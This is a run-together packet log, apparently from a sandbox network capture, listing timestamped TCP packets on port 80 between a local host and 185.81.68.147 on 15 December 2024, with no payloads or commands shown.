                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.049364090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.050266027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.050359964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.050380945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.051419020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.051532030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.051620007 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.052607059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.052676916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.052725077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.053761959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.053818941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.053833008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.054980040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.055063009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.055080891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.056045055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.056159973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.056261063 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.057209969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.057264090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.057337046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.058387995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.058516026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.058571100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.059531927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.059590101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.059639931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.098762035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.191852093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.191963911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.192128897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.192224026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.192320108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.192679882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.193505049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.193612099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.194587946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.194683075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.194696903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.194746971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.195744991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.195859909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.196717024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.196873903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.197009087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.198038101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.198132038 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.198196888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.198292971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.199239969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.199439049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.200381041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.200467110 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.200479984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.200527906 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.201522112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.201662064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.201754093 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.202744961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.202797890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.203852892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.203938007 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.203970909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.204063892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.205060005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.205143929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.205499887 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.206180096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.206298113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.206382036 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.207370996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.207484961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.207570076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.208513021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.208606958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.208693027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.209657907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.209800005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.209883928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.210819960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.210949898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.211036921 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.212013006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.212193966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.212279081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.213201046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.213361025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.213449001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.214330912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.214466095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.214545965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.215487957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.215662956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.215749025 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.216640949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.216723919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.216979980 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.217777014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.217922926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.218008995 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.219183922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.219305038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.219393969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.220268965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.220360041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.220443964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.221266031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.221380949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.221467018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.222439051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.222588062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.222676039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.223618984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.223776102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.223855019 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.224754095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.224874020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.224965096 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.225939035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.226027966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.226114035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.227102995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.227232933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.227338076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.228241920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.228331089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.228410959 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.229407072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.229558945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.229640961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.230645895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.230732918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.230813980 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.231704950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.231863976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.231944084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.232935905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.233088970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.233180046 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.234096050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.234170914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.234256983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.235282898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.235316992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.235404968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.236329079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.236439943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.236522913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.237575054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.237719059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.237803936 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.238666058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.238756895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.238836050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.239845991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.239986897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.240097046 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.241187096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.241409063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.241524935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.242155075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.242276907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.243355989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.243438959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.243463039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.243491888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.244518995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.244616985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.244810104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.245877981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.245944023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.246032953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.246798038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.246898890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.247919083 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.247975111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.248060942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.248145103 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.249109983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.249233961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.249325037 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.250272036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.250374079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.250480890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.251442909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.251558065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.251646042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.252557039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.301892042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.383975983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.384159088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.384253979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.384404898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.384515047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.384550095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.385510921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.385623932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.385668039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.386657953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.386786938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.386830091 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.387875080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.387937069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.387979031 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.388986111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.389094114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.389131069 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.390242100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.390455008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.390494108 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.391753912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.391887903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.391932011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.392993927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.393073082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.393112898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.393733025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.393892050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.393954992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.394836903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.394906998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.394949913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.395971060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.396087885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.396132946 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.397183895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.397278070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.397365093 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.398426056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.398601055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.398684978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.399507046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.399565935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.399636984 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.400643110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.400702953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.400775909 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.401856899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.402127981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.402199030 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.403012991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.403126001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.403201103 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.404177904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.404267073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.404344082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.405329943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.405493975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.405570030 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.406457901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.406558037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.406639099 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.407603979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.407715082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.407794952 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.408792973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.408899069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.408972025 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.409989119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.410058022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.410125017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.411173105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.411290884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.411326885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.412269115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.412318945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.412355900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.413431883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.413532019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.413570881 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.414588928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.414714098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.414753914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.415760994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.415802956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.415875912 CET4970880192.168.2.5185.81.68.147
